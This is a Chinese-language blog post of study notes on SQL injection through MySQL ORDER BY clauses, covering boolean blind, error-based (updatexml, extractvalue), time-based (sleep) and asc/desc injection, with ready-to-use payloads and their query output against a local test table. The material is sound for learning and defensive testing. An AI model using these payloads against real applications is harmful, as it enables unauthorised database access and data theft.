zoukankan      html  css  js  c++  java

  • 小结--order by 注入

    之前已经学过的东西,准备把他们依次总结下,包括之前看的一些文章,一些小的tricks之类的,就先从注入开始吧

    0x01 盲注

    1. 判断1和0

    a. if

    select * from user where user_id=1 order by 1-if(substr(version(),1,1)=5,1,(select 1 union select 2));
+-------+-----------+---------+
| user  | password  | user_id |
+-------+-----------+---------+
| admin | admintest |       1 |
+-------+-----------+---------+
1 row in set (0.00 sec)

    b.rand

    mysql> select rand(true);
+---------------------+
| rand(true)          |
+---------------------+
| 0.40540353712197724 |
+---------------------+
1 row in set (0.00 sec)

mysql> select rand(false);
+---------------------+
| rand(false)         |
+---------------------+
| 0.15522042769493574 |
+---------------------+
1 row in set (0.00 sec)

    这里可以利用rand(true) rand(false)的值不同,排序注入后面的顺序也不同

    mysql> select * from user order by 1-rand(substr(version(),1,1)=5);
+-------+-----------+---------+
| user  | password  | user_id |
+-------+-----------+---------+
| test  | testadmin |       2 |
| admin | admintest |       1 |
| sp4rk | sp4rktest |       3 |
+-------+-----------+---------+
3 rows in set (0.02 sec)

    c.regexp
    select * from user order by 1-if(1=(select 1 regexp if(1=1,1,0x00)),1,1);

    0x02 报错注入

    select * from user order by 1-updatexml(1,concat(0x5e24,version(),0x5e24),0);
ERROR 1105 (HY000): XPATH syntax error: '^$5.7.22-0ubuntu18.04.1^$'
mysql> select * from user order by 1-extractvalue(1,concat(0x5e24,version(),0x5e24));
ERROR 1105 (HY000): XPATH syntax error: '^$5.7.22-0ubuntu18.04.1^$'

    0x03 延时注入

    select * from user order by 1-if(ascii(substr(user(),1,1))=114,sleep(5),0);

    0x04 asc desc处

    1.盲注

    mysql> select user from user order by user,if(substr(version(),1,1)=5,1,(select 1 union select 2)) desc;
+-------+
| user  |
+-------+
| admin |
| sp4rk |
| test  |
+-------+

    报错,延时同上

    0x05 逻辑区别进行排序

    mysql> select user from user order by 1-if(1=1,user,user_id);
+-------+
| user  |
+-------+
| admin |
| test  |
| sp4rk |
+-------+
3 rows in set, 3 warnings (0.00 sec)

mysql> select user from user order by 1-if(1=1,user_id,user);
+-------+
| user  |
+-------+
| sp4rk |
| test  |
| admin |
+-------+

payload:    ,if(1=1,user_id,user);
,(case when (1=1) then user_id else user end)
,ifnull(null,user_id)
,rand(1=1)

    0x06利用报错判断

    payload:
if(1=1,1,(select 1 union select 2))  正确
if(1=2,1,(select 1 union select 2)) 错误
if(1=1,1,(select 1 from information_schema.tables)) 正确
if(1=2,1,(select 1 from information_schema.tables)) 错误
  • 相关阅读:
    宋宝华: 文件读写(BIO)波澜壮阔的一生【转】
    内核工具 – Sparse 简介【转】
    【java】JSON.toJSONString 空对象也可以转化为JSON字符串
    Seata分布式事务简单使用
    Mixin 工作原理
    公链
    公链
    公链
    公链
    公链
  • 原文地址:https://www.cnblogs.com/spark-xl/p/9080398.html
Copyright © 2011-2022 走看看